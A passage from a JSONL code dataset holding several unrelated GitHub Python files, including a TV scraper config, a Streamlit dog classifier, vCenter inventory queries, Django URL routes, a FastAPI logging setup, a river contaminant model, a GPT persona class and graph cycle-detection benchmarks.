else:\n _threshold = Threshold.GREEN\n return _threshold\n","repo_name":"ztroop/wave-reader-utils","sub_path":"wave_reader/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":5070,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"70261178329","text":"# -*- coding:utf-8 -*-\nimport os\nimport configparser\n\ncp = configparser.ConfigParser()\ncp.read(os.path.dirname(os.path.abspath(__file__))+r'/config.ini', encoding='utf-8')\n\n# user_agents\nUAS = [\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;\",\n \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\",\n \"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\",\n \"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11\",\n \"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\"\n ]\n\n# mongodb setting\nMD_HOST = str(cp.get('MONGODB', 'host'))\nMD_PORT = int(cp.get('MONGODB', 'port'))\nMD_DATABASE = str(cp.get('MONGODB', 'database'))\nMD_USER = str(cp.get('MONGODB', 'user'))\nMD_PWD = str(cp.get('MONGODB', 'pwd'))\n\n# mysql setting\nMS_HOST = str(cp.get('MYSQL', 'host'))\nMS_PORT = int(cp.get('MYSQL', 'port'))\nMS_DATABASE = str(cp.get('MYSQL', 'database'))\nMS_USER = str(cp.get('MYSQL', 'user'))\nMS_PWD = str(cp.get('MYSQL', 'pwd'))\n\nTV_TYPE_MAIN = 'MAIN'\nTV_TYPE_3PART = '3PART'\n\n# tv_spider_url相关\nTV_FS_MAIN_URL = str(cp.get('TV_SPIDER_URL', 'tv_fs_main'))\nTV_FS_3PART_URL = str(cp.get('TV_SPIDER_URL', 'tv_fs_3part'))\nTV_FS_URL_MAP = {TV_TYPE_MAIN: TV_FS_MAIN_URL, TV_TYPE_3PART: TV_FS_3PART_URL}\nTV_FS_URL_MAP_RE = {TV_FS_MAIN_URL: TV_TYPE_MAIN, TV_FS_3PART_URL: TV_TYPE_3PART}\n\n# tv_spider_index_url_file 相关\nTV_FS_INDEX_MAIN_FILE = str(cp.get('TV_SPIDER_INDEX_FILE', 'tv_fs_main_file'))\nTV_FS_INDEX_3PART_FILE = str(cp.get('TV_SPIDER_INDEX_FILE', 'tv_fs_3part_file'))\nTV_FS_INDEX_URL_FILE_MAP = {TV_TYPE_MAIN: TV_FS_INDEX_MAIN_FILE, TV_TYPE_3PART: TV_FS_INDEX_3PART_FILE}\n\n# tv_spider_url_file相关\nTV_FS_MAIN_FILE = str(cp.get('TV_SPIDER_URL_FILE', 'tv_fs_main_file'))\nTV_FS_3PART_FILE = str(cp.get('TV_SPIDER_URL_FILE', 'tv_fs_3part_file'))\nTV_FS_FILE_MAP = {TV_TYPE_MAIN: TV_FS_MAIN_FILE, TV_TYPE_3PART: TV_FS_3PART_FILE}\nTV_FS_TIMIMG_FILE_MAP = {TV_TYPE_MAIN: 'timing_main.txt', TV_TYPE_3PART: 'timing_3part.txt'}\n\n# tv_spider_xpath相关\nTV_FS_MAIN_XPATH = {}\nfor option in cp.options('TV_SPIDER_XPATH_MAIN'):\n TV_FS_MAIN_XPATH[option] = str(cp.get('TV_SPIDER_XPATH_MAIN', option))\nTV_FS_3PART_XPATH = {}\nfor option in cp.options('TV_SPIDER_XPATH_3PART'):\n TV_FS_3PART_XPATH[option] = str(cp.get('TV_SPIDER_XPATH_3PART', option))\nTV_FS_XPATH_MAP = {TV_TYPE_MAIN: TV_FS_MAIN_XPATH, TV_TYPE_3PART: TV_FS_3PART_XPATH}\n\nTV_EXCLUDE_TYPE = ['美女热舞写真', '街拍系列', '伦理片', '音乐片', '伦理', '福利片', 'VIP视频秀', 'vip视频秀']\n\nif __name__ == '__main__':\n print(TV_FS_URL_MAP)\n print(TV_FS_XPATH_MAP)\n\n","repo_name":"xwl5242/tvspider","sub_path":"config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2379103839","text":"import streamlit as st\nfrom model import run_app\nfrom PIL import Image\n\n## streamlit app\nst.set_option(\"deprecation.showfileUploaderEncoding\", False)\n\nst.title(\"Dog or Human Classifier\")\nst.text(\n \"Upload an Image for image classification as dog or human.\\nI will also predict the dog breed in the image.\\nIf you are human I will tell you which breed you look like\"\n)\n\nuploaded_file = st.file_uploader(\n \"Upload your image here ...\", type=[\"jpg\", \"jpeg\", \"png\"]\n)\nif uploaded_file is not None:\n image = Image.open(uploaded_file).convert('RGB')\n run_app(image)\n st.image(uploaded_file, use_column_width=True)\n","repo_name":"gstdl/dog-classification-streamlit","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3457374197","text":"def read_file(filename):\n\tlines = []\n\twith open(filename, 'r', encoding='utf-8-sig') as f:\n\t\tfor line in f:\n\t\t\tlines.append(line.strip())\n\treturn lines\n\n\ndef convert(lines): #轉換\n\tperson = None\n\tJ_word_count = 0\n\tJ_sticker_count = 0\n\tJ_image_count = 0\n\tS_word_count = 0\n\tS_sticker_count = 0\n\tS_image_count = 0\n\tfor line in lines:\n\t\ts = line.split(' ')\n\t\ttime = s[0]\n\t\tname = s[1]\n\t\tif name == 'J':\n\t\t\tif s[2] == '貼圖':\n\t\t\t\tJ_sticker_count += 1\n\t\t\telif s[2] == '圖片':\n\t\t\t\tJ_image_count +=1\n\t\t\telse:\n\t\t\t\tfor m in s[2:]:\n\t\t\t\t\tJ_word_count += len(m)\n\t\telif name == '紹安-2':\n\t\t\tif s[2] == '貼圖':\n\t\t\t\tS_sticker_count += 1\n\t\t\telif s[2] == '圖片':\n\t\t\t\tS_image_count += 1\n\t\t\telse:\n\t\t\t\tfor m in s[2:]:\n\t\t\t\t\tS_word_count += len(m)\n\tprint('J說了', J_word_count, '個字, 傳了', J_sticker_count, '個貼圖, ', J_image_count, '張圖片')\n\tprint('紹安說了', S_word_count, '個字, 傳了', S_sticker_count, '個貼圖, ', S_image_count, '張圖片')\n\t\t# print(s)\n\n\ndef write_file(filename, lines):\n\twith open(filename, 'w') as f:\n\t\tfor line in lines:\n\t\t\tf.write(line + '\\n')\n\n\ndef main():\n\tlines = read_file('com.txt')\n\tlines = convert(lines)\n\t# write_file('output.txt', lines)\n\n\nmain()","repo_name":"aaaaa20021029/chat","sub_path":"r2.py","file_name":"r2.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8430401411","text":"import atexit\nfrom pyVmomi import vim,vmodl\nfrom pyVim.connect import SmartConnectNoSSL,Disconnect\nfrom pyVim.connect import SmartConnect\nimport operator\nimport time\nfrom datetime import timedelta\n\ndef vCenterLogin(host,user,pwd,port):\n try:\n si = SmartConnectNoSSL(host=host, user=user, pwd=pwd, port=port)\n #si = SmartConnect(host=host, user=user, pwd=pwd, port=port)\n atexit.register(Disconnect, si)\n content = si.RetrieveContent()\n time=si.CurrentTime()\n except vmodl.MethodFault as error:\n print (\"Caught vmodl fault : \" + error.msg)\n return False, error.msg\n return content\n\n\ndef getDatastores(content):\n Datastores={}\n for datacenter in content.rootFolder.childEntity:\n datastores = datacenter.datastore\n datastore_Info={}\n for ds in datastores:\n datastore_Info={}\n name=ds.summary.name\n if name.find(\"datastore1\",0,len(name))!=0:\n datastore_Info[\"name\"]=ds.summary.name\n datastore_Info[\"datastore\"]=ds.summary.datastore\n datastore_Info[\"url\"]=ds.summary.url\n datastore_Info[\"capacity\"]=ds.summary.capacity\n datastore_Info[\"freeSpace\"]=ds.summary.freeSpace\n datastore_Info[\"uncommitted\"]=ds.summary.uncommitted\n datastore_Info[\"type\"]=ds.summary.type\n datastore_Info[\"mantenanceMode\"]=ds.summary.maintenanceMode\n Datastores[ds.summary.name]=datastore_Info\n return Datastores\n\n \n\ndef getHosts(content):\n hostsInfo={}\n for datacenter in content.rootFolder.childEntity:\n if hasattr(datacenter.hostFolder, 'childEntity'):\n hostFolder = datacenter.hostFolder\n computeResourceList = []\n computeResourceList = getComputeResource(hostFolder,computeResourceList)\n for computeResource in computeResourceList:\n hostlist=computeResource.host\n for host in hostlist:\n info={}\n info['biosVersion']=host.hardware.biosInfo.biosVersion\n info['quickStats']=host.summary.quickStats\n info['uptime']=host.summary.quickStats.uptime\n info['name']=host.name\n info['network']=host.network\n info['vm']=host.vm\n info['memory']=host.hardware.memorySize\n info['cpu']=host.hardware.cpuPkg[0].description\n info['cpu_hz']=host.hardware.cpuPkg[0].hz\n info['cpu_cores']=host.hardware.cpuInfo.numCpuCores\n info['cpu_packages']=host.hardware.cpuInfo.numCpuPackages\n info['cpu_threads']=host.hardware.cpuInfo.numCpuThreads\n info['model']=host.hardware.systemInfo.model\n info['vendor']=host.hardware.systemInfo.model\n hostsInfo[host.name]=info\n return hostsInfo\n \n\ndef getPerfManager(content,interval,startTime,endTime):\n perf_dict = {}\n perfList = content.perfManager.perfCounter\n for counter in perfList:\n counter_full = \"{}.{}.{}\".format(counter.groupInfo.key, counter.nameInfo.key, counter.rollupType)\n perf_dict[counter_full] = counter.key\n print(BuildQuery(content, time.time(), (perf_id(perf_dict, 'net.transmitted.average')), \"\", \"10.10.10.205\", 60))\n\ndef BuildQuery(content, startTime,endTime,entity,intervalId):\n result={}\n perfManager = content.perfManager\n metricId = vim.PerformanceManager.MetricId(counterId=counterId, instance=instance)\n startTime = vchtime \n endTime = vchtime \n obj=content.viewManager.CreateContainerView(content.rootFolder, [vim.VirtualMachine], True)\n for vm in obj.view:\n query = vim.PerformanceManager.QuerySpec(entity=vm)\n perfResults = perfManager.QueryPerf(querySpec=[query])\n result[vm.name]=perfResults\n return result\n\n\ndef perf_id(perf_dict, counter_name):\n counter_key = perf_dict[counter_name]\n return counter_key\n\ndef getVM(content):\n obj = content.viewManager.CreateContainerView(content.rootFolder, [vim.VirtualMachine], True)\n vmInfo={}\n for vm in obj.view:\n vm_name=vm.name\n list=[]\n for datastore in vm.datastore:\n list.append(datastore.name)\n vmInfo[vm_name]=list\n return vmInfo\n \n \n \n\ndef getComputeResource(Folder,computeResourceList):\n if hasattr(Folder, 'childEntity'):\n for computeResource in Folder.childEntity:\n getComputeResource(computeResource,computeResourceList)\n else:\n computeResourceList.append(Folder)\n return computeResourceList\n","repo_name":"HsuChihwen/ZabbixReport","sub_path":"snmp/vCenter.py","file_name":"vCenter.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2232308020","text":"from django.conf.urls import url\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns=[\n url('^$',views.home,name = 'home'),\n url(r'^post/(?P[0-9]+)/review_engine/$', views.rate_engine, name='rate_engine'),\n url(r'^post/(?P[0-9]+)/review_usability/$', views.rate_usability, name='rate_usability'),\n url(r'^post/(?P[0-9]+)/review_body/$', views.rate_body, name='rate_body'),\n url(r'^image/(\\d+)',views.image,name ='image'),\n url(r'^upload_image/$', views.upload_image, name='upload_image'),\n url(r'^search/', views.search_results, name='search_results'),\n url(r'^user/(\\d+)$', views.profile, name='profile'),\n url(r'^profile/update/$', views.edit_profile, name='edit_profile'),\n url(r'^comment/(?P\\d+)', views.comment, name='comment'),\n url(r'^like/(?P\\d+)', views.like, name='like'),\n\n]\n\nif settings.DEBUG:\n urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)","repo_name":"vinnyotach7/Car-Bizz","sub_path":"carapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14493419306","text":"#!/usr/bin/env python\n\nimport sys\nimport pandas as pd\nimport math\nimport myhw6mod as mymod\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\n\"\"\"\ntry: \n if sys.argv[1] == \"-\":\n lines = sys.stdin.readlines()\n else:\n # use open() to open a file \n lines = open(sys.argv[1]).readlines()\nexcept:\n print(\"Usage: %s \" % sys.argv[0])\n sys.exit(1)\n\"\"\"\n\ntry:\n file_name = sys.argv[1]\n data = pd.read_csv(file_name)\nexcept:\n print(\"Please provide a valid file name.\")\n sys.exit(1)\n\nxlist = []\nylist = []\nsse = 0\nbad_obs = 0\n\nfor i in range(1,data.shape[0]):\n x = mymod.haversine(data.loc[i,'pickup_longitude'],data.loc[i,'pickup_latitude'],data.loc[i,'dropoff_longitude'],data.loc[i,'dropoff_latitude'])\n if x == 0:\n bad_obs = 0\n continue\n xlist.append(x)\n y = data.loc[i,'total_amount']/x\n ylist.append(y)\n sse += math.pow(x-data.loc[i,'trip_distance'],2)\n\n\nplt.scatter(xlist, ylist, marker = 'o', c= 'r', s = 40)\nplt.xlabel(\"Distance\");\nplt.ylabel(\"Cost per Mile\")\nplt.show()\n\nrmse = math.sqrt(sse/(data.shape[0]-bad_obs))\nprint(\"rmse is\",rmse)\n","repo_name":"shengzhang0830/PhD_Computing_for_Business_Research","sub_path":"HW6/PlotTaxiData.py","file_name":"PlotTaxiData.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73676469207","text":"\"\"\"\nSettings for application logging\n\"\"\"\nimport coloredlogs\nimport logging\n\nfrom pysense.settings import LOG_FILE\n\nLOG_FORMAT = '%(asctime)s %(name)s %(thought)s %(levelname)s: %(message)s'\n\n\nclass CustomLogger(logging.Logger):\n \"\"\"\n Custom logger implementation\n \"\"\"\n\n def _log(self, level, msg, args,\n exc_info=None, extra=None, stack_info=None):\n if extra is None:\n extra = {}\n if 'thought' not in extra:\n extra['thought'] = 'core'\n super(CustomLogger, self)._log(\n level, msg, args, exc_info, extra, stack_info)\n\n\nlogging.setLoggerClass(CustomLogger)\npysense_logger = logging.getLogger('pysense')\npysense_logger.setLevel(getattr(logging, 'DEBUG'))\n\ncoloredlogs.install(fmt=LOG_FORMAT, level='DEBUG', logger=pysense_logger)\n\nif LOG_FILE:\n PYSENSE_FORMATTER = logging.Formatter(\n LOG_FORMAT, datefmt='%Y-%m-%d %H:%M:%S')\n PYSENSE_HANDLER = logging.FileHandler(LOG_FILE)\n PYSENSE_HANDLER.setFormatter(PYSENSE_FORMATTER)\n pysense_logger.addHandler(PYSENSE_HANDLER)\n","repo_name":"diegorubin/pysense","sub_path":"pysense/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"31285432440","text":"from unicodedata import category\nfrom rest_framework import serializers\nfrom .models import Category, Item, Order, ItemOrder\nclass CategorySerializer(serializers.ModelSerializer):\n item = serializers.SerializerMethodField()\n def get_item(self,obj):\n items = [{\n \"name\" : item_obj.name,\n \"category\" : obj.name,\n \"image_url\" : item_obj.image_url,\n \"category_id\": obj.id\n }for item_obj in obj.item_set.all()]\n return items\n class Meta:\n model = Category\n fields = [\"item\", \"name\"]\n\nclass ItemSerilizer(serializers.ModelSerializer):\n category = CategorySerializer()\n class Meta:\n model = Item\n fields = [\"name\", \"category\",\"image_url\",]\n\nclass OrderSerializer(serializers.ModelSerializer):\n item = ItemSerilizer()\n class Meta:\n model = Order \n fields = [\"delivery_address\", \"order_date\", \"item\"]\n\nclass ItemOrderSerializer(serializers.ModelSerializer):\n order = OrderSerializer()\n item = ItemSerilizer()\n class Meta:\n model = ItemOrder\n fields = [\"order\",\"item\",\"item_count\"]","repo_name":"about-joo91/morning_quiz2","sub_path":"item/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28925102700","text":"import os\nimport openai\nfrom constants import *\n\nopenai.organization = GPT_ORGANIZATION_KEY\nopenai.api_key = GPT_API_KEY\nENGINE = GPT_ENGINE\n\nclass GPTInstance:\n def __init__(self, instance_id, instance_name, instance_traits=None, instance_hobbies=None, instance_desc=None, instance_misc=None):\n \n assert(isinstance(instance_traits, list))\n assert(isinstance(instance_hobbies, list))\n \n # GPT Instance Attributes\n self.id = instance_id\n self.name = instance_name\n self.traits = instance_traits\n self.hobbies = instance_hobbies\n self.description = instance_desc\n self.misc = instance_misc\n self.full_desc = self.__generate_character_full_desc()\n \n # GPT Instance Data Records\n self.message_records = []\n \n \n def __get_str_hobbies(self):\n str_hobbies = \", \".join(self.hobbies)\n idx = str_hobbies.rfind(\",\")\n str_hobbies = str_hobbies[:idx+1] + \" and\" + str_hobbies[idx+1:]\n return str_hobbies\n \n \n def __get_str_traits(self):\n str_traits = \", \".join(self.traits)\n idx = str_traits.rfind(\",\")\n str_traits = str_traits[:idx+1] + \" and\" + str_traits[idx+1:]\n return str_traits\n \n \n def __generate_character_full_desc(self):\n return self.__format_stab(CHARACTER_DESC_STAB)\n \n \n def __format_stab(self, given_stab):\n res = given_stab \\\n .replace(\"\", self.name) \\\n .replace(\"\", self.description) \\\n .replace(\"\", self.__get_str_hobbies()) \\\n .replace(\"\", self.__get_str_traits())\n return res\n \n\n def train(self, friends_desc: list):\n \"\"\"\n Train GPT instance based on the given configurations.\n \n openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\n {\"role\": \"user\", \"content\": \"Who won the world series in 2020?\"},\n {\"role\": \"assistant\", \"content\": \"The Los Angeles Dodgers won the World Series in 2020.\"},\n {\"role\": \"user\", \"content\": \"Where was it played?\"}\n ]\n )\n \"\"\"\n \n print(\"CALLED --\")\n assert(isinstance(friends_desc, list))\n \n training_stab = self.__format_stab(TRAINING_STAB)\n for desc in friends_desc:\n training_stab = training_stab.replace(\"\", desc)\n self.__user_message(training_stab)\n \n # try:\n # questions = TRAINING_EXAMPLES[\"user\"]\n # answers = TRAINING_EXAMPLES[\"assistant\"]\n # assert(len(questions) == len(answers))\n # except:\n # pass\n \n # for i in range(len(questions)):\n # q = self.__format_stab(questions[i])\n # self.__user_message(q)\n \n # a = self.__format_stab(answers[i])\n # self.__assistant_message(a)\n \n \n return training_stab\n # first = True\n # while True:\n # if not first:\n # message = input(\"INPUT: \")\n # self.message_records.append(self.__user_message(message))\n # first = False\n \n # print(\"/////// Waiting for reply...\\n\")\n # response = openai.ChatCompletion.create(\n # model=ENGINE,\n # messages=self.message_records\n # )\n \n # reply = response[\"choices\"][0][\"message\"][\"content\"]\n # self.message_records.append(self.__assistant_message(reply))\n # print(reply)\n # print(\"\\n===============================================================\")\n \n \n def __system_message(self, message):\n \"\"\"\n The system message helps set the behavior of the assistant. \n The assistant can be instructed with \"You are a helpful assistant.\"\n \"\"\"\n gpt_message = {\"role\": \"system\", \"content\": message}\n self.message_records.append(gpt_message)\n return gpt_message\n \n \n def __user_message(self, message):\n \"\"\"\n The user messages help instruct the assistant.\n They can be generated by the end users of an application, or set by a developer as an instruction.\n \"\"\"\n gpt_message = {\"role\": \"user\", \"content\": message}\n self.message_records.append(gpt_message)\n return gpt_message\n \n \n def __assistant_message(self, message):\n \"\"\"\n The assistant messages help store prior responses. \n They can help give examples of desired behavior.\n \"\"\"\n gpt_message = {\"role\": \"assistant\", \"content\": message}\n self.message_records.append(gpt_message)\n return gpt_message\n \n\n# messages = []\n# system_msg = input(\"What type of chatbot would you like to create? \")\n# messages.append({\"role\": \"system\", \"content\": system_msg})\n\n# print(\"Say hello to your new assistant!\")\n# while input != \"quit()\":\n# message = input()\n# messages.append({\"role\": \"user\", \"content\": message})\n \n# response = openai.ChatCompletion.create(\n# model=ENGINE,\n# messages=messages\n# )\n \n# reply = response\n# messages.append({\"role\": \"assistant\", \"content\": reply})\n# print(reply)\n \n# exit()\n\n\nif __name__ == \"__main__\":\n instance = GPTInstance(\n instance_id=\"C0\", \n instance_name=\"Elaina Frost\", \n instance_traits=[\n \"friendly\",\n \"honest\",\n \"diligent\"\n ],\n instance_hobbies=[\n \"violin\",\n \"painting water color\",\n \"hiking\"\n ],\n instance_desc=\"First-year Biology major university student at High Tech University. Minored in Art and Design.\"\n )\n \n instance2 = GPTInstance(\n instance_id=\"C1\", \n instance_name=\"Sarah Anderson\", \n instance_traits=[\n \"inspirational\",\n \"caring\",\n \"decisive\"\n ],\n instance_hobbies=[\n \"cooking\",\n \"video games\",\n \"puzzles\"\n ],\n instance_desc=\"First-year Food and Cooking major university student at High Tech University.\"\n )\n \n # print(instance2.full_desc)\n \n print(instance.train(friends_desc=[instance2.full_desc]))","repo_name":"ReZeroE/GPT-Simulation","sub_path":"back-end/gpt/gpt_instance.py","file_name":"gpt_instance.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"23262294847","text":"import os\nimport typing\n\nfrom fastapi import FastAPI, Request, Response, status\nfrom fastapi.responses import PlainTextResponse\n\nfrom jukebox.access import log_request, log_response\nfrom jukebox.logging import Logger\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\nasync def initialize() -> None:\n # Log initialization\n Logger.info(\"Booting worker with pid: {}\", os.getpid())\n\n\n@app.on_event(\"shutdown\")\nasync def finalize() -> None:\n # Log termination\n Logger.info(\"Stopping worker with pid: {}\", os.getpid())\n\n\n@app.middleware(\"http\")\nasync def log_http_request(request: Request, call_next: typing.Callable[..., typing.Awaitable[Response]]) -> Response:\n # Log the request and response\n log_request(request)\n response: Response = await call_next(request)\n log_response(request, response.status_code)\n\n return response\n\n\n@app.exception_handler(Exception)\nasync def server_crash_handler(request: Request, exc: Exception) -> Response:\n # Log error response\n log_response(request, status.HTTP_500_INTERNAL_SERVER_ERROR, exc_info=exc)\n\n return PlainTextResponse(\n status_code=status.HTTP_500_INTERNAL_SERVER_ERROR,\n content=\"Internal Server Error\",\n )\n","repo_name":"jukebox-io/jukebox","sub_path":"jukebox/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42163773438","text":"import numpy\r\nimport pandas\r\nimport pickle\r\nfrom return_contaminant import simulated_contaminants, error_formulae\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport time\r\nfrom src.library import shapefile_raster_functions\r\n\r\n\r\n# Load data\r\ndirectory = os.path.join(os.getcwd(), 'data')\r\ndirectory2 = os.path.join(os.getcwd(), 'results')\r\n\r\n# output\r\ncalibrated_nonadapted_location = os.path.join(directory2, \"calibrated_nonadapted.shp\")\r\n\r\n# open the input files\r\ngraph_location = os.path.join(directory, \"river_graph.pkl\")\r\ntopological_sort_location = os.path.join(directory, \"sorted_river_list.pkl\")\r\nreference_raster_location = os.path.join(directory, \"reference_raster.tif\")\r\ncontamination_df_location = os.path.join(directory, \"AGG_WWTP_df_all_adapted.csv\")\r\nscenario_number = \"\"\r\nobserved_df_location = os.path.join(directory, \"pollution_observed.csv\")\r\n\r\ncontamination_df = pandas.read_csv(contamination_df_location)\r\nobserved_df = pandas.read_csv(observed_df_location)\r\n\r\ndatapoint_locations = observed_df[\"locations\"]\r\nobserved_values = observed_df[\"contaminant\"].to_numpy()\r\ndatapoint_count = len(observed_values)\r\nopen_graph = open(graph_location, \"rb\")\r\nriver_graph = pickle.load(open_graph)\r\nriver_graph = river_graph[0]\r\nopen_graph.close()\r\nopen_ts = open(topological_sort_location, \"rb\")\r\nsorted_river_list = pickle.load(open_ts)\r\nsorted_river_list = sorted_river_list[0]\r\nopen_ts.close()\r\n\r\nk, filt_eff, s_eff, t_eff = [0.00995203, 0.99993389, 0.63221308, 0.81011981]\r\n\r\nbeta_0 = 1\r\ngr, rl, cont, sc_nr, locs, obs = [river_graph, sorted_river_list, contamination_df, '', datapoint_locations,\r\n observed_values]\r\nsim_results, discharges = simulated_contaminants(filt_eff, s_eff, t_eff, k, beta_0, gr, rl, cont, sc_nr,\r\n locs, obs)\r\ndischarges = discharges/numpy.mean(discharges)\r\ndischarge_weights = numpy.sqrt(discharges)\r\nimplied_excretion = numpy.mean(obs)/numpy.mean(sim_results)\r\nimplied_excretion = numpy.mean(obs*discharge_weights) / numpy.mean(sim_results*discharge_weights)\r\n#implied_excretion = numpy.sum(sim_results*obs*discharges) / numpy.sum(sim_results**2 * discharges)\r\nsim_results *= implied_excretion\r\nprint(implied_excretion)\r\nerror, mean_error = error_formulae(obs, sim_results, discharges, option=0, weighted=1)\r\nprint(1 - error / mean_error)\r\n\r\nplt.plot(obs, sim_results, 'o')\r\nplt.plot(sim_results, sim_results)\r\nplt.xlabel(\"Prediction\")\r\nplt.ylabel(\"Outcome\")\r\nplt.show()\r\nplt.clf()\r\n\r\nplt.plot(numpy.log(1+obs), numpy.log(1+sim_results), 'o')\r\nplt.plot(numpy.log(1+sim_results), numpy.log(1+sim_results))\r\nplt.xlabel(\"Prediction\")\r\nplt.ylabel(\"Outcome\")\r\nplt.show()\r\nplt.clf()\r\n\r\nplt.plot(obs*discharge_weights, sim_results*discharge_weights, 'o')\r\nplt.plot(sim_results*discharge_weights, sim_results*discharge_weights)\r\nplt.xlabel(\"Prediction\")\r\nplt.ylabel(\"Outcome\")\r\nplt.show()\r\nplt.clf()\r\n\r\n# log error\r\nsim_results_log = numpy.log(1 + sim_results*discharges)\r\nobs_log = numpy.log(1 + obs*discharges)\r\nobs_log_mean = numpy.mean(obs_log)\r\nlog_error = numpy.square(sim_results_log - obs_log)\r\nlog_var = numpy.square(obs_log - obs_log_mean)\r\nlog_R_sqr = 1 - numpy.sum(log_error)/numpy.sum(log_var)\r\nprint(\"log squared error: \" + str(log_R_sqr))\r\n\r\nnormal_error = numpy.square(sim_results-obs)\r\nmean_error = numpy.square(obs-numpy.mean(obs))\r\nnormal_R_sqr = 1 - numpy.sum(normal_error)/numpy.sum(mean_error)\r\nprint(\"normal squared error: \" + str(normal_R_sqr))\r\n\r\ndistance_error = numpy.abs(sim_results-obs)\r\nabsolute_dev = numpy.abs(obs-numpy.mean(obs))\r\ndistance_explained = 1 - numpy.sum(distance_error)/numpy.sum(absolute_dev)\r\nprint(\"distance to mean error: \" + str(distance_explained))\r\n\r\nabsolute_dev = numpy.abs(obs-numpy.median(obs))\r\ndistance_explained = 1 - numpy.sum(distance_error)/numpy.sum(absolute_dev)\r\nprint(\"distance to median error: \" + str(distance_explained))\r\n\r\npercentage_error = numpy.abs(sim_results-obs)/(obs+1)\r\npercentage_error = numpy.mean(percentage_error)\r\nprint(\"percentual error: \" + str(percentage_error))\r\n\r\nerror_of_sum = 1 - numpy.sum(distance_error)/numpy.sum(obs)\r\nprint(\"error of sum: \" + str(error_of_sum))\r\n\r\n# create shapefile\r\ndischarges = discharges / numpy.mean(discharges)\r\ndataframe = pandas.DataFrame()\r\ndataframe['locations'] = locs\r\ndataframe['Prediction'] = sim_results\r\ndataframe['Observations'] = obs\r\ndataframe['Error'] = (dataframe['Prediction'] - dataframe['Observations'])**2\r\ndataframe['Error'] = dataframe['Error'] / numpy.mean(dataframe['Error'])\r\ndataframe['weighted error'] = dataframe['Error'] * numpy.sqrt(discharges)\r\ndataframe['weighted error'] = dataframe['weighted error'] / numpy.mean(dataframe['weighted error'])\r\nshapefile_raster_functions.contaminant_to_shapefile(dataframe, reference_raster_location, output_name=calibrated_nonadapted_location)\r\n","repo_name":"icra/wOtter","sub_path":"src/7.4. statistics_contaminants.py","file_name":"7.4. statistics_contaminants.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17466272897","text":"import os\nimport time\n\nfrom mygraph import MyGraph\nfrom dfs import DFS\nfrom johnson_simple_cycle import Johnson\nfrom tajan_scc import Tarjan_SCC\nfrom topology import Topology\nfrom undirectioned_bfs import Undirected_BFS\nfrom dsu import DSU\n\n\ndef benchmark(alg):\n rounds = 10\n for round in range(rounds):\n t1 = time.time()\n result = alg.detect_loop()\n t2 = time.time()\n t = (t2 - t1) / rounds\n return result, f\"{t:0,.8f}\"\n\ndef benchmark2(file):\n rounds = 10\n dsu = DSU()\n dsu.load_file(file)\n\n for round in range(rounds):\n t1 = time.time()\n result = dsu.detect_loop()\n t2 = time.time()\n t = (t2 - t1) / rounds\n return result, f\"{t:0,.8f}\"\n\nif __name__ == \"__main__\":\n # Create graph using file\n for file in os.listdir(\"data/\"):\n if not file.endswith(\"edgelist\"):\n continue\n\n test_file = \"data/\" + file\n print(\"test using file \", file)\n g = MyGraph(1)\n g.load_directed_graph(test_file)\n #g.load_undirected_graph(test_file)\n\n\n alg = DSU()\n print(\"\\tDSU (undirected): \", end = \" \")\n result, runtime = benchmark2(test_file)\n print(\"\\t\\t result = \", result, \" time = \", runtime, \" second\", end=\" \")\n print(\"\")\n\n\n alg = Topology(g)\n print(\"\\tTopology Sort: \", end = \" \")\n result, runtime = benchmark(alg)\n print(\"\\t\\t result = \", result, \" 